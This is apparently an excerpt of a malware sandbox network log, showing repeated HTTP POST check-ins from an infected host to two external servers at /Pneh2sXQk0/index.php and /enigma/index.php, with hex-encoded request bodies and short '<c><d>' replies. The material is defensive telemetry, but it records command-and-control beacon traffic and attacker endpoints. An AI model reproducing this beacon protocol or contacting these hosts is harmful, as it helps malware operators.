                                                                                                                                                                                                                                      1374192.168.2.551228193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:17.267703056 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:17.514614105 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1375192.168.2.551230193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:17.559027910 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:17.807255030 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1376192.168.2.551231193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:17.851099968 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:18.096894026 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1377192.168.2.551232193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:18.056127071 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:18.305314064 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1378192.168.2.551233193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:18.351531982 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:18.603972912 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1379192.168.2.551234193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:18.656086922 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:18.904742002 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1380192.168.2.551235193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:18.943095922 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:19.187158108 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1381192.168.2.551236193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:19.155095100 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:19.406025887 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1382192.168.2.551237193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:19.438570976 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:19.689110994 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1383192.168.2.551238193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:19.737612963 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:19.977926016 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1384192.168.2.551239193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:20.020148993 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:20.261888027 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1385192.168.2.551240193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:20.233139992 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:20.489478111 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1386192.168.2.551241193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:20.510063887 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:20.757633924 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1387192.168.2.551242193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:20.842156887 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:21.093945026 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1388192.168.2.551243193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:21.083071947 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:21.326636076 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1389192.168.2.551244193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:21.344871044 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:21.596725941 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1390192.168.2.551245193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:21.575195074 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:21.825201035 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
